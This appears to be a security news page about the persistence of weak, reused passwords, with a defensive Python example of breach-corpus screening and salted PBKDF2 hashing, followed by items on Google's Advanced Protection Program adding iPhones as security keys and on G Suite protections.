Despite the problem of password fatigue and reuse coming into clearer focus over the past few years, little has changed in the world’s most popular passwords. Among the more than nine billion collected last year, the top three are “123456,” “123456789,” and “qwerty,” and are being used to protect some 125 million accounts.
It is increasingly up to organizations to comply with NIST’s password guidelines, which recommend checking user passwords against those that have been exposed in previous breach corpuses, as well as against commonly used or easy-to-guess passwords.
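The two defensive measures this report points at (screening new passwords against a breach corpus, including the “minor variation” trick of capitalising the first letter or appending digits, and storing passwords with a salted slow KDF instead of MD5/SHA-1) are shown together below in an added example written for this page; it is not SpyCloud’s code, and the breach corpus it uses is a constructed sample of the report’s top-three passwords plus two made-up entries.

```python
import hashlib
import hmac
import os
import re

# Constructed sample breach corpus (not real breach data): the three most
# popular passwords named in the report plus two made-up entries.
BREACH_CORPUS = {"123456", "123456789", "qwerty", "summer2012", "letmein"}

def canonical(password: str) -> str:
    """Collapse the 'minor changes' the report describes (capitalising the
    first letter, appending digits or symbols) so variants compare equal.
    A password made only of digits/symbols is kept as-is."""
    stripped = re.sub(r"[0-9!@#$%^&*.]+$", "", password)
    return (stripped or password).lower()

# Pre-compute canonical forms once so each check is a set lookup.
CANONICAL_CORPUS = {canonical(p) for p in BREACH_CORPUS}

def is_compromised(password: str) -> bool:
    """NIST SP 800-63B style screening: reject a password that appears in the
    breach corpus either verbatim or as a trivial variant of a breached entry."""
    return password in BREACH_CORPUS or canonical(password) in CANONICAL_CORPUS

def hash_password(password: str, salt: bytes = b"") -> tuple:
    """Store the password with a salted, deliberately slow KDF (PBKDF2-HMAC-SHA256)
    instead of a bare MD5 or SHA-1 digest, so a leaked hash is costly to crack."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 600_000)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute the KDF with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 600_000)
    return hmac.compare_digest(candidate, digest)

if __name__ == "__main__":
    for pw in ("Summer2012!", "Qwerty99", "correct horse battery staple"):
        print(f"{pw!r}: {'REJECT' if is_compromised(pw) else 'ok'}")
    salt, digest = hash_password("correct horse battery staple")
    print("verify:", verify_password("correct horse battery staple", salt, digest))
```

In production the corpus lookup would be backed by a full breach dataset (or a k-anonymity range query against a breach-check service), but the canonicalisation and the KDF choice are the same.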
Google users who opt for the Advanced Protection Program (APP) to secure their accounts are now able to use their iPhone as a security key.
About Google’s Advanced Protection Program
Google introduced the Advanced Protection Program in late 2017 to help high-risk users – journalists, human rights activists, IT admins, executives, etc. – keep their Google accounts safe from targeted attacks.
APP is available to both consumer (Google Account) and enterprise users (G Suite).
It initially allowed users to make their accounts more secure by requiring them to have and use a physical security key to provide additional user verification during the login process.
In May 2019, Google made it possible to replace the physical security key with one’s Android device. Now, finally, iPhone and iPad users can take advantage of that option, too.
Using iPhones for APP
Google considers security keys to be the strongest protection against account takeover attacks, whether they are automated bot attacks, bulk phishing attacks or extremely targeted (and tailored) attacks.
Making security more convenient is key to improving the adoption of security practices. By offering Android and iPhone/iPad users the option to use their devices as a security key, Google is making it easier for users to enroll into APP.
Let’s face it: we take our mobile phones with us everywhere and most of us are very conscientious about keeping the battery charged. Physical security keys, on the other hand:
- Are pricey for some
- May not be available for purchase to all who need them, and
- Are a piece of hardware that some might not want to have to keep track of and lug around all the time.
To be able to use one’s iPhone for APP, users have to have an iPhone running iOS 10+, the latest version of Google’s Smart Lock installed on it, and Bluetooth enabled.
The device through which they are signing into their account has to have the latest version of a compatible browser (e.g., Chrome), the latest version of a compatible OS (e.g., Chrome OS, Mac OS, or Windows 10), and Bluetooth enabled.
Google has provided this helpful guide on how to set up one’s phone’s built-in security key and use it.
Google has introduced new security options for G Suite customers, including Advanced Protection for enterprise users and access control for apps accessing G Suite data.
Advanced Protection for high-risk users
The Advanced Protection option was in beta since August 2019, and is now generally available to all G Suite editions and on by default. It allows admins to enforce a specific set of high-security policies for employees in their organization that are most at risk …